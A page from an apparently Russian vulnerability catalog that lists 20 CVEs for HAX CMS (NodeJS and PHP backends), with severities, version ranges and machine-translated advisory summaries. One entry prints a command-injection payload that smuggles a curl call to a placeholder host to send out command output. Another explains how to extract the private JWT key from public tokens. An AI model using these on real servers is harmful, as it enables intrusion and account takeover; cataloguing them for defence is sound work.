Сканер-ВСкаталог уязвимостей · v4.2

Главная Каталог Источники CWE CAPEC ATT&CK Меры защиты Продукты Вендоры Документация

← Вернуться к списку

Haxtheweb›Приложениеanchore_overrides

Haxcms-nodejs

Уязвимости

20

Эксплуатируемые

0

Макс. CVSS

9.4

Макс. EPSS

0.01496

Распределение по критичности

Критический

5

Высокий

8

Средний

7

Низкий

0

Затронутые диапазоны версий

11.0.6–25.0.0< 11.0.0< 11.0.10< 11.0.13< 11.0.14< 11.0.3< 11.0.6< 11.0.7< 11.0.8< 11.0.9< 26.0.0< 26.0.1

Топ уязвимостей

CVE-2026-46399HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. PHP-версия HAX CMS до версии 26.0.0 имеет аутентифицированную уязвимость записи файлов. Злоумышленник может использовать эту уязвимость для настройки вредоносных команд фильтра Git и достижения выполнения кода на сервере HAX CMS. Версия 26.0.0 латирует проблему.

CVE-2026-46496HAX CMS помогает управлять вселенной микросайтов с помощью бэкэндов PHP или NodeJs. Сохраняемая уязвимость кросс-сайтов (XSS) существует в версиях до 26.0.0 из-за неправильной санации компонента `<video-player>`. Компонент позволяет «javascript:` URIs в атрибуте «источник», которые выполняются при просмотре страницы. Это позволяет злоумышленникам выполнять произвольный JavaScript в контексте браузера жертвы и получать доступ к конфиденциальным данным, таким как токены JWT и многое другое. Версия 26.0.0 исправляет проблему.

CVE-2026-46396HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. Сохраняющаяся уязвимость кросс-сайтов (XSS) существует в версиях до 26.0.0 из-за неправильной дезинфайлизации `<iframe>` элементов. Приложение допускает `javascript:` URI в атрибуте `src`, которые выполняются при просмотре вредоносной страницы. Это позволяет злоумышленникам выполнять произвольный JavaScript в контексте браузера жертвы и получать доступ к конфиденциальным данным, отображаемых на стороне клиента. Версия 26.0.0 исправляет проблему.

CVE-2026-46395HAX CMS помогает управлять вселенной микросайтов с помощью бэкэндов PHP или NodeJs. До версии 26.0.0 функция `hmacBase64(()` в бэкэнде HAXcms Node.js содержит две критические криптографические ошибки реализации, которые вместе позволяют любому неаутентифицированному злоумышленнику извлекать ключ частной подписи системы и создавать произвольные веб-токены админ-уровня JSON (JWT), позволяющие им получить полный доступ администратора с помощью одного запроса HTTP. Во-первых, функция передает буквальную строку «0» в качестве клавиши подписи HMAC вместо параметра клавиши, что делает так, чтобы каждый экземпляр HAXcms вычислял идентичные HMAC для одного и того же входа. Затем, после вычисления HMAC, функция конкатенирует реальный ключевой параметр, который является «this.privateKey + this.salt», секрет мастерской подписи системы непосредственно на выходе. Комбинированный буфер закодирован base64 и возвращен в качестве токена. Каждый произведенный токен base64url имеет одинаковую структуру: 32 байт HMAC с поддержкой «0» и N байтов «privateKey+salt`». Нападатель base64-декодирует любой токен, отбрасывает первые 32 байта и считывает закрытый ключ напрямую. '//system/api/connectionSettings` конечная точка не является аутентифицированной и возвращает несколько токенов, генерируемых этой функцией. Один запрос GET к этой конечной точке обнажает закрытый ключ. Бэкэнд PHP правильно реализует эту функцию с помощью фактического ключа и возвращает только хеш. PHP-версия производит 44-символьные токены, в то время как сломанная версия Node.js производит 139+ токенов символов. Версия 26.0.0 исправляет проблему.

CVE-2025-54127HAXcms с бэкэндом NodeJS позволяет пользователям запускать сервер в любом экземпляре HAXsite или HAXcms. В версиях 11.0.6 и ниже версия NodeJS HAXcms использует небезопасную конфигурацию по умолчанию, предназначенную для локальной разработки. Конфигурация по умолчанию не выполняет проверки авторизации или аутентификации. Если пользователь развернет haxcms-nodejs без изменения настроек по умолчанию, ‘HAXCMS_DISABLE_JWT_CHECKS‘ будет установлено в ‘true‘, и их развертывание будет лишено аутентификации сеанса [1]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-f38f-jvqj-mfg6

CVE-2025-49141Уязвимость HAX CMS PHP позволяет пользователям управлять своей вселенной микросайтов с помощью бэкэнда PHP. До версии 11.0.3 функция `gitImportSite` получает строку URL из POST-запроса и недостаточно проверяет пользовательский ввод. Функция `set_remote` затем передает этот ввод в `proc_open`, что приводит к инъекции команд ОС. Аутентифицированный злоумышленник может создать строку URL, которая обходит проверки валидации, выполняемые функциями `filter_var` и `strpos`, чтобы выполнить произвольные команды ОС на сервере бэкэнда. Злоумышленник может извлечь вывод команды через HTTP-запрос [1]. Уязвимость существует в логике функции `gitImportSite`, расположенной в `Operations.php`. Текущая реализация полагается только на функции `filter_var` и `strpos` для валидации URL, что недостаточно для обеспечения отсутствия всех специальных символов Bash, используемых для инъекции команд. Для воспроизведения уязвимости необходимо аутентифицироваться и отправить POST-запрос к эндпоинту `gitImportSite` с поддельным URL в данных JSON. Пример payload для инъекции команды: http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef [2]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw - [2] https://github.com/haxtheweb/haxcms-nodejs/commit/5131fea6b6be611db76a618f89bd2e164752e9b3

CVE-2026-48527HAX CMS помогает управлять вселенной микросайтов с помощью бэкэндов PHP или NodeJs. Версификации до 26.0.0 включительно затронуты сохраненной уязвимостью кросс-сайтов (XSS) в конечной точке `/system/api/saveNode`. Аутентифицированный пользователь с разрешением на редактирование страниц может обойти дезинфицирующее средство HTML, впрыснув атрибут обработчика событий без белого пространства перед именем атрибута. @haxtheweb/haxcms-nodejs 26.0.1 и haxcms-php 26.0.2 исправляет проблему.

CVE-2026-46511HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. До версии 26.0.0 атаковая цепочка, используюющая Хранилищ XSS наряду с динамическим воздействием токенов в конечной точке `/system/api/connectionSettings`, позволяет аутентифицированному злоумышленнику выполнить полное поглощение учетной записи через систему систем. API динамически пропускает токены аутентификации активной сессии (включая `jwt`, `user_token`, `site_token` и `appstore_token``) в глобальную переменную JavaScript (`window.appSettings`). Злоумышленник может использовать уязвимость XSS, чтобы заставить браузер жертвы молча получить их определенные настройки соединения, извлечь токены и эксфильтрацию их в веб-крючок, контролируемый злоумышленником. Версия 26.0.0 латирует проблему.

CVE-2025-54378HAX CMS позволяет управлять вашим микрозависимым миром с помощью бэкэнда PHP или NodeJs. В версиях 11.0.13 и ниже haxcms-nodejs и версиях 11.0.8 и ниже haxcms-php конечные точки API не выполняют проверки авторизации при взаимодействии с ресурсом. И версия JS, и версия PHP CMS не проверяют, имеет ли пользователь разрешение на взаимодействие с ресурсом перед выполнением данной операции. Конечные точки API в приложении HAX CMS проверяют, аутентифицирован ли пользователь, но не проверяют авторизацию перед выполнением операции. Это исправлено в версиях 11.0.14 haxcms-nodejs и 11.0.9 haxcms-php.

CVE-2025-54137HAX CMS NodeJS позволяет пользователям управлять своей вселенной микросайтов с помощью бэкэнда NodeJS. Версии до 11.0.10 содержали захардкоженные учетные данные по умолчанию для учетных записей пользователя и суперпользователя, а также использовали дефолтные приватные ключи для JWT. Пользователям не предлагается изменить учетные данные или секреты во время установки, и нет возможности изменить их через UI. Неавторизованный злоумышленник может прочитать дефолтные учетные данные и приватные ключи из публичных репозиториев haxtheweb на GitHub и использовать их для доступа к не настроенным экземплярам приложения, изменения сайтов и выполнения дальнейших атак [1]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-5fpv-5qvh-7cf3 - [2] https://github.com/haxtheweb/haxcms-nodejs/commit/6dc2441c876350ca6fe9fbaecb058d92ef442869 - [3] https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/lib/HAXCMS.js#L1614

CVE-2025-54128В HAX CMS NodeJS версии до 11.0.7 отключена политика безопасности контента (CSP), что делает приложение не защищенным от атак XSS [1]. Проблема исправлена в версии 11.0.8. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-59g8-h59f-8hjp

CVE-2026-46393HAX CMS помогает управлять вселенной микросайтов с помощью бэкэндов PHP или NodeJs. Аутентифицированная уязвимость подделки запросов на серверную сторону (SSRF) в версиях до 26.0.0 позволяет аутентифицированным пользователям получать произвольные внутренние или локальные ресурсы и записывать ответы в веб-доступный каталог, обеспечивая произвольное чтение файлов и внутренний доступ к сети. Версия 26.0.0 содержит исправление.

CVE-2025-54134В HAX CMS NodeJs версии 11.0.8 и ниже приложение падает при получении API-запроса без обязательных параметров URL. Эта уязвимость затрагивает конечные точки listFiles и saveFiles. Уязвимость существует из-за того, что приложение не обрабатывает должным образом исключения, возникающие при изменении параметров URL [1]. Злоумышленник может вызвать отказ в обслуживании приложения HAX CMS NodeJS, что сделает его недоступным для всех пользователей [2]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-pjj3-j5j6-qj27 - [2] https://github.com/haxtheweb/haxcms-nodejs/commit/e9773d1996233f9bafb06832b8220ec2a98bab34 - [3] https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/listFiles.js#L22 - [4] https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/saveFile.js#L52

CVE-2026-46397HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. До версии 26.0.0 уязвимость Authenticated Local File Inclusion (LFI) в конце HAXCMS saveOutline позволяет низкопривилегированному пользователю считывать произвольные файлы на сервере, манипулируя полем определения местоположения, записанным в site.json. Это позволяет злоумышленникам эксфильтровать конфиденциальные системные файлы, такие как /etc/passwd, секреты приложений или конфигурационные файлы, доступные для веб-сервера (www-data). Версия 26.0.0 латирует проблему.

CVE-2026-46357HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. До версии 26.0.0 приложение HAX CMS NodeJS падает, когда аутентифицированный злоумышленник отправляет специально созданный запрос на создание сайта на конечную точку сайта. Одного запроса достаточно, чтобы отключить все приложение, требуя перезапуска ручного сервера для восстановления обслуживания. Версия 26.0.0 исправляет проблему.

CVE-2025-53642Функция выхода из haxcms-nodejs и haxcms-php не завершает сеанс пользователя и не очищает его cookies. Кроме того, приложение выдает токен обновления при выходе. Злоумышленник может воспользоваться отсутствием функциональности выхода для доступа к учетной записи пользователя на общем устройстве. Также текущее поведение оставляет пользователей более уязвимыми для атак на кражу cookie [1]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-g4f5-5w5j-p5jg

CVE-2025-49139HAX CMS PHP позволяет пользователям управлять своей вселенной микросайтов с помощью бэкэнда PHP. До версии 11.0.0 в редакторе сайтов HAX пользователи могли создать блок сайта для загрузки другого сайта в iframe. Приложение позволяет пользователям указывать целевой URL в блоке сайта. Когда сайт HAX посещается, браузер клиента запрашивает указанный URL. Аутентифицированный злоумышленник может создать сайт HAX с блоком сайта, указывающим на контролируемый злоумышленником сервер, на котором запущен Responder или аналогичный инструмент. Злоумышленник может затем провести фишинговую атаку, убедив другого пользователя посетить свой вредоносный сайт HAX для сбора учетных данных. Версия 11.0.0 содержит исправление для этой проблемы. Источники: https://github.com/haxtheweb/issues/security/advisories/GHSA-v3ph-2q5q-cg88 [1], https://github.com/haxtheweb/haxcms-nodejs/commit/5368eb9b278ca47cd9a83b8d3e6216375615b8f5 [2] Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-v3ph-2q5q-cg88 - [2] https://github.com/haxtheweb/haxcms-nodejs/commit/5368eb9b278ca47cd9a83b8d3e6216375615b8f5

CVE-2025-54139HAX CMS позволяет пользователям управлять своей вселенной микросайтов с помощью бэкэнда NodeJS или PHP. В версиях haxcms-nodejs до 11.0.12 и haxcms-php до 11.0.7 все страницы приложения HAX CMS не содержат заголовков, предотвращающих загрузку сайта в iframe. Это относится как к CMS, так и к сгенерированным сайтам. Неавторизованный злоумышленник может загрузить страницу входа или другие конфиденциальные функции внутри iframe, выполняя атаку UI redressing (clickjacking). Это можно использовать для проведения атак социальной инженерии в попытке побудить пользователей выполнять непреднамеренные действия в приложении HAX CMS. Исправлено в версии haxcms-nodejs 11.0.13 и haxcms-php 11.0.8 [1]. Источники: - [1] https://github.com/haxtheweb/issues/security/advisories/GHSA-54vw-f4xf-f92j - [2] https://github.com/haxtheweb/haxcms-nodejs/commit/777f9a7ff9675a160496f350d766df1f1f9b9b99 - [3] https://github.com/haxtheweb/haxcms-php/commit/708dc8518928fe307044e67bff8b0f397cfdd606

CVE-2026-22704HAX CMS помогает управлять вселенной микросайтов с помощью бэкэндов PHP или NodeJs. В версиях 11,0.6 до 25.0.0 HAX CMS уязвима для хранения XSS, что может привести к захвату учетной записи. Этот вопрос был исправлен в версии 25.0.0.

CVE-2026-46401HAX CMS помогает управлять вселенной микросайтов с помощью PHP или NodeJs backends. Версии до 26.0.0 страдают от ненадлежащей уязвимости прекращения сеанса, когда токены аутентификации остаются действительными после выпуска пользователя. Это позволяет злоумышленникам, которые получают действительные токены, поддерживать постоянный доступ к аутентифицированным функциональным возможностям CMS, обходя предполагаемый механизм прекращения сеанса и обеспечивая несанкционированный доступ к метаданным CMS и административным функциям. Версия 26.0.0 исправляет проблему.

Перейти к вендору →Открыть в каталоге с фильтром по продукту →